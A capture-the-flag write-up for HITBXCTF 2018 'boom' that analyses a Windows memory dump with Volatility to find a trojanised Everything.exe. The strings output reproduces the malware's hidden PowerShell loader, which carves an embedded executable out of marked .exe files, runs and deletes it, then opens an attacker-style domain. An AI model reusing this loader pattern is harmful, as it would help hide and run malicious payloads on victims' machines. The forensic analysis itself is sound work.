HITBXCTF 2018 Quals - boom
We are given a .vmem file, which is a memory file generated by VMware. The problem description indicates that this VM might be infected with a malware, so let's use Volatility to analyze this memory dump.
Let's check what OS this memory dump is running:
$ volatility -f BOOM-6452e9b9.vmem imageinfo
Volatility Foundation Volatility Framework 2.5
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
AS Layer1 : AMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (.../BOOM-6452e9b9.vmem)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf80003fff0a0L
Number of Processors : 2
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0xfffff80004000d00L
KPCR for CPU 1 : 0xfffff880009ef000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2018-04-05 08:29:56 UTC+0000
Image local date and time : 2018-04-05 16:29:56 +0800
Let's consider the running OS as Win7SP1x64 and list the running processes:
$ volatility -f BOOM-6452e9b9.vmem --profile=Win7SP1x64 psscan Volatility Foundation Volatility Framework 2.5 Offset(P) Name PID PPID PDB Time created Time exited ------------------ ---------------- ------ ------ ------------------ ------------------------------ ------------------------------ 0x000000007d0d81f0 msdtc.exe 1992 516 0x0000000077525000 2018-04-04 15:28:29 UTC+0000 0x000000007d0dab30 cmd.exe 1348 1212 0x0000000038154000 2018-04-05 08:27:22 UTC+0000 2018-04-05 08:27:39 UTC+0000 0x000000007d109b30 dllhost.exe 1896 516 0x000000004599c000 2018-04-04 15:28:29 UTC+0000 0x000000007d248b30 svchost.exe 600 516 0x00000000145af000 2018-04-04 15:28:26 UTC+0000 0x000000007d285540 svchost.exe 1112 516 0x0000000017541000 2018-04-04 15:28:27 UTC+0000 0x000000007d28a5b0 explorer.exe 2532 2492 0x0000000034c9e000 2018-04-04 15:30:26 UTC+0000 0x000000007d290b30 spoolsv.exe 1212 516 0x0000000017755000 2018-04-04 15:28:27 UTC+0000 0x000000007d2af1a0 mscorsvw.exe 2764 516 0x000000006a0e7000 2018-04-04 15:30:28 UTC+0000 0x000000007d2de7e0 svchost.exe 1244 516 0x00000000186fc000 2018-04-04 15:28:27 UTC+0000 0x000000007d3b4060 VGAuthService. 1384 516 0x00000000178e6000 2018-04-04 15:28:27 UTC+0000 0x000000007d3e4210 vmtoolsd.exe 1456 516 0x000000001676c000 2018-04-04 15:28:28 UTC+0000 0x000000007d3e9b30 ManagementAgen 1480 516 0x00000000162f2000 2018-04-04 15:28:28 UTC+0000 0x000000007d413060 winlogon.exe 480 408 0x0000000020cf6000 2018-04-04 15:28:26 UTC+0000 0x000000007d428b30 services.exe 516 416 0x00000000086a2000 2018-04-04 15:28:26 UTC+0000 0x000000007d434060 lsm.exe 540 416 0x000000001f851000 2018-04-04 15:28:26 UTC+0000 0x000000007d436610 lsass.exe 532 416 0x000000001f649000 2018-04-04 15:28:26 UTC+0000 0x000000007d50e970 svchost.exe 664 516 0x000000001c541000 2018-04-04 15:28:26 UTC+0000 0x000000007d532920 vmacthlp.exe 724 516 0x000000001ee7b000 2018-04-04 15:28:26 UTC+0000 0x000000007d53eb30 svchost.exe 768 516 0x0000000053d03000 2018-04-04 15:28:26 UTC+0000 0x000000007d571060 svchost.exe 832 516 0x000000005378d000 2018-04-04 15:28:26 UTC+0000 0x000000007d57cb30 svchost.exe 892 516 0x000000005329a000 2018-04-04 15:28:26 UTC+0000 0x000000007d5a8b30 svchost.exe 936 516 0x00000000125a5000 2018-04-04 15:28:26 UTC+0000 0x000000007d8d1060 wininit.exe 416 344 0x0000000021861000 2018-04-04 15:28:26 UTC+0000 0x000000007d8db7b0 csrss.exe 432 408 0x0000000021bf0000 2018-04-04 15:28:26 UTC+0000 0x000000007da5cb30 csrss.exe 364 344 0x0000000021ddb000 2018-04-04 15:28:25 UTC+0000 0x000000007e243b30 WmiPrvSE.exe 1852 664 0x000000000e653000 2018-04-04 15:28:29 UTC+0000 0x000000007e94bb30 smss.exe 276 4 0x0000000023138000 2018-04-04 15:28:25 UTC+0000 0x000000007e9cab30 taskhost.exe 2388 516 0x0000000074651000 2018-04-04 15:30:26 UTC+0000 0x000000007ed2e810 Everything.exe 3764 1564 0x0000000077807000 2018-04-05 08:29:20 UTC+0000 0x000000007edb62b0 ipconfig.exe 3440 3372 0x000000002ef83000 2018-04-05 08:29:56 UTC+0000 2018-04-05 08:29:56 UTC+0000 0x000000007efbe330 SearchFilterHo 1260 3016 0x000000002ddfe000 2018-04-05 08:29:06 UTC+0000 0x000000007efc7540 audiodg.exe 3960 832 0x000000003eefe000 2018-04-05 08:29:20 UTC+0000 0x000000007efcc5f0 cmd.exe 3372 1456 0x000000003fe85000 2018-04-05 08:29:56 UTC+0000 2018-04-05 08:29:56 UTC+0000 0x000000007f0e5a30 dwm.exe 2508 892 0x0000000073675000 2018-04-04 15:30:26 UTC+0000 0x000000007f67bb30 dllhost.exe 2364 664 0x0000000049662000 2018-04-04 15:49:16 UTC+0000 0x000000007f773680 netsh.exe 2428 1212 0x0000000034bde000 2018-04-05 08:28:07 UTC+0000 2018-04-05 08:28:07 UTC+0000 0x000000007f78eb30 svchost.exe 1088 516 0x000000004771d000 2018-04-04 15:41:44 UTC+0000 0x000000007f7e1460 StikyNot.exe 2252 2532 0x00000000379a7000 2018-04-04 15:49:33 UTC+0000 0x000000007f834b30 SearchIndexer. 3016 516 0x000000003ae0d000 2018-04-04 15:30:30 UTC+0000 0x000000007f860b30 svchost.exe 2968 516 0x0000000015308000 2018-04-04 15:30:29 UTC+0000 0x000000007f9d6060 cmd.exe 1096 1212 0x00000000752ec000 2018-04-05 08:25:33 UTC+0000 2018-04-05 08:26:49 UTC+0000 0x000000007f9ec060 sc.exe 3064 1212 0x00000000332be000 2018-04-05 08:28:07 UTC+0000 2018-04-05 08:28:07 UTC+0000 0x000000007fa5d060 wordpad.exe 3316 1564 0x0000000041a4b000 2018-04-05 08:29:50 UTC+0000 0x000000007fa7f060 conhost.exe 3368 364 0x000000000ca7a000 2018-04-05 08:29:56 UTC+0000 2018-04-05 08:29:56 UTC+0000 0x000000007faa7390 rdpclip.exe 2460 1112 0x0000000071564000 2018-04-05 08:29:07 UTC+0000 0x000000007fac6b30 taskhost.exe 1340 516 0x000000006d95f000 2018-04-05 08:29:07 UTC+0000 0x000000007fb0bb30 SearchProtocol 1820 3016 0x00000000744a7000 2018-04-05 08:29:26 UTC+0000 0x000000007fb15b30 dwm.exe 2228 892 0x0000000032414000 2018-04-05 08:29:07 UTC+0000 0x000000007fb23b30 explorer.exe 1564 1624 0x0000000066338000 2018-04-05 08:29:07 UTC+0000 0x000000007fb74060 vmtoolsd.exe 2632 2532 0x0000000070551000 2018-04-04 15:30:26 UTC+0000 0x000000007fbb9b30 svchost.exe 2800 516 0x000000006a6f5000 2018-04-04 15:30:28 UTC+0000 0x000000007fbcf060 mscorsvw.exe 2880 516 0x000000006a1fc000 2018-04-04 15:30:29 UTC+0000 0x000000007fbfc060 sppsvc.exe 2932 516 0x000000002c482000 2018-04-04 15:30:29 UTC+0000 0x000000007fca0b30 winlogon.exe 888 2092 0x00000000304c0000 2018-04-05 08:28:11 UTC+0000 0x000000007fccab30 csrss.exe 1836 2092 0x000000002f03b000 2018-04-05 08:28:11 UTC+0000 0x000000007fd228d0 csrss.exe 2984 2380 0x000000001bbb9000 2018-04-05 08:29:06 UTC+0000 0x000000007fd36b30 regsvr32.exe 2736 1564 0x0000000064a39000 2018-04-05 08:29:08 UTC+0000 2018-04-05 08:29:08 UTC+0000 0x000000007fdec630 vmtoolsd.exe 3748 1564 0x0000000045e6b000 2018-04-05 08:29:19 UTC+0000 0x000000007fdf3b30 winlogon.exe 2212 2380 0x00000000121be000 2018-04-05 08:29:06 UTC+0000 0x000000007feb2060 SearchProtocol 2752 3016 0x000000002e873000 2018-04-05 08:29:06 UTC+0000 0x000000007feb8b30 LogonUI.exe 1672 2212 0x000000003a14d000 2018-04-05 08:29:06 UTC+0000 0x000000007ff39990 System 4 0 0x0000000000187000 2018-04-04 15:28:25 UTC+0000
Everything.exe seems shady. Let's dump it:
$ volatility -f BOOM-6452e9b9.vmem --profile=Win7SP1x64 procdump -p 3764 -D . Volatility Foundation Volatility Framework 2.5 Process(V) ImageBase Name Result ------------------ ------------------ -------------------- ------ 0xfffffa8002b2e810 0x0000000000400000 Everything.exe OK: executable.3764.exe
As with many memory forensics challenge, it is quite useful to run strings on it:
$ strings executable.3764.exe
... [snip]
...
powershell -WindowStyle Hidden -Command "Get-ChildItem .\ | ForEach-Object -Process {if($_ -is [System.IO.FileInfo]){if($_.FullName.indexof(""".exe""") -eq -1){return;}$cont = (Get-Content -raw $_.FullName);if($cont.indexof("""qwedcxzarfvbnhyt""") -eq -1){return;}echo $_.FullName;[byte[]]$bytes = [System.IO.File]::ReadAllBytes($_.FullName);Set-Content -Path """.\temp.exe""" -Value $Bytes[-0X19010..-0X11] -encoding Byte;.\temp.exe;rm .\temp.exe;}};Start-Process -FilePath http://HYTN_B_C_DoRR_.cn;"
Looks like there are something related to PowerShell inside this executable, which makes it even more shady. Some RE confirms it as the process entry point is overwritten with some code that runs the above command. Start-Process -FilePath with an URL will open a browser window with that URL, that explains the weird paths mentioned in the problem description.
The flag doesn't follow normal format, and is the domain name of what we've found: HYTN_B_C_DoRR_.cn
There are a lot of useful and funny tricks I've learned when solving that problem; however the time to writeup is limited so I'll add it later :3
